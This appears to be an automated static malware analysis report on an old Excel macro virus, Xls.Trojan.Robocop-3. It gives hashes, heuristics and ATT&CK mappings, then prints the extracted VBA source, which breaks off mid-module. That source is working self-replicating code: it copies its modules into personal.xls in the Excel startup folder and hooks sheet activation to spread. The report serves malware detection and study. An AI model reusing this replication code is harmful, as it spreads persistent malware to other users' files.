Xls.Trojan.Robocop-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ba3c66db56f708d9…

MALICIOUS

Office (OLE)

Size: 23.5 KB
Created: 1997-05-29 17:16:31
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: f005126e1684b0f7a3db63a409154b98
SHA-1: 3beab63499428413376ade8c3ecd67dd362a3af7
SHA-256: ba3c66db56f708d9de0667f7857665f4dd1dc92eae227e82bf452c3cf51f204b
Risk Score: 160

Malware Insights

Xls.Trojan.Robocop-3 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

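This Excel document contains VBA macros, including Auto_Open and Auto_Close, which are indicative of malicious intent because Excel runs them automatically when the workbook is opened or closed. The Auto_Open macro attempts to copy its modules (ROBO and COP) into the 'personal.xls' workbook, or saves a copy of the workbook as 'personal.xls' in the Excel startup path when no such workbook is open, likely to establish persistence. The ClamAV detection name 'Xls.Trojan.Robocop-3' further supports the malicious classification.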

Heuristics 4

  • ClamAV: Xls.Trojan.Robocop-3 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Robocop-3
  • VBA macros detected · medium · 2 related findings · OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro · high · OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro · high · OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5284 bytes
SHA-256: d4726bfddcf5f02cdd272582de766ea04bd9ef4e360b3336499d99933888ae7e

Script preview: first 1,000 lines of the extracted script
Attribute VB_Name = "Module1"

Attribute VB_Name = "ROBO"



'
' Auto_Open macro
' Macro recorded on 30.12.1996 by Unknown User
'
'
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim v%, p%
    
    gp = 0
    vp = 0
   
    Application.ScreenUpdating = False
    For x = 1 To Application.Workbooks.Count
        If Application.Workbooks(x).Name = "personal.xls" Then
            gp = 1
            For y = 1 To Application.Workbooks("personal.xls").Modules.Count
            If Application.Workbooks("personal.xls").Modules(y).Name = "ROBO" Then
                vp = 1
            End If
        Next
        
        If vp = 0 Then
            Windows("personal.xls").Visible = True
            Set a = Application.ActiveWorkbook
            Application.Workbooks(a.Name).Modules("ROBO").Copy after:=Application.Workbooks("personal.xls").Modules(1)
            Application.Workbooks(a.Name).Modules("COP").Copy after:=Application.Workbooks("personal.xls").Modules(1)
            
            Sheets("COP").Select
            ActiveWindow.SelectedSheets.Visible = False
            
            Sheets("ROBO").Select
            ActiveWindow.SelectedSheets.Visible = False
            
            Windows("personal.xls").Visible = False
            Application.OnSheetActivate = ActiveWorkbook.Name & "!COP.ROBOCOP"
            Application.Workbooks("personal.xls").Save
        End If
        End If
    Next
        If gp = 0 Then
        Set a = Application.ActiveWorkbook
        Application.Workbooks(a.Name).SaveCopyAs Application.StartupPath + "\personal.xls"
        Application.Workbooks.Open (Application.StartupPath + "\personal.xls")
        Windows("personal.xls").Visible = False
        Application.Workbooks("personal.xls").Save
        End If
    Application.ScreenUpdating = True
    
'nice harmless Payload.

d = Day(v)
m = Month(p)
If d = 1 And m = 3 Then
    Selection.RowHeight = 100
    Selection.ColumnWidth = 255
    Range("A3").Select
    With Selection.Font
        .Name = "Imprint MT Shadow"
        .Size = 24
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlNone
        .ColorIndex = xlAutomatic
    End With
    Range("A3").Select
    ActiveCell.FormulaR1C1 = "ROBOCOP Nightmare Joker [SLAM]"
    With ActiveCell.Characters(Start:=1, Length:=8).Font
        .Name = "Imprint MT Shadow"
        .FontStyle = "Standard"
        .Size = 48
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlNone
        .ColorIndex = xlAutomatic
    End With
    With ActiveCell.Characters(Start:=9, Length:=22).Font
        .Name = "Imprint MT Shadow"
        .FontStyle = "Standard"
        .Size = 20
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlNone
        .ColorIndex = xlAutomatic
    End With
    Range("A2").Select
Else
    '...
End If

Application.OnSheetActivate = Workbooks("personal.xls").Name & "!COP.ROBOCOP"
    
End Sub


Attribute VB_Name = "Module2"

Attribute VB_Name = "COP"



'
' Auto_Close macro
' Macro recorded on 30.12.1996 by Unknown User
'
'
Sub ROBOCOP()
Attribute ROBOCOP.VB_Description = "Makro am 30.12.1996 von Unbekannter Benutzer aufgezeichnet"
Attribute ROBOCOP.VB_ProcData.VB_Invoke_Func = " \n0"
    gp = 0
    vp = 0
    
    Set a = Application.ActiveWorkbook
    
    Application.ScreenUpdating = False
    For x = 1 To Application.Workbooks.Count
        If Application.Workbooks(x).Name = a.Name Then
            gp = 1
            For y = 1 To Application.Workbooks(a.Name).Modules.Count
            If Application.Workbooks(a.Name).Modules(y).Name = "ROBO" Then
                vp = 1
            End If
... (truncated)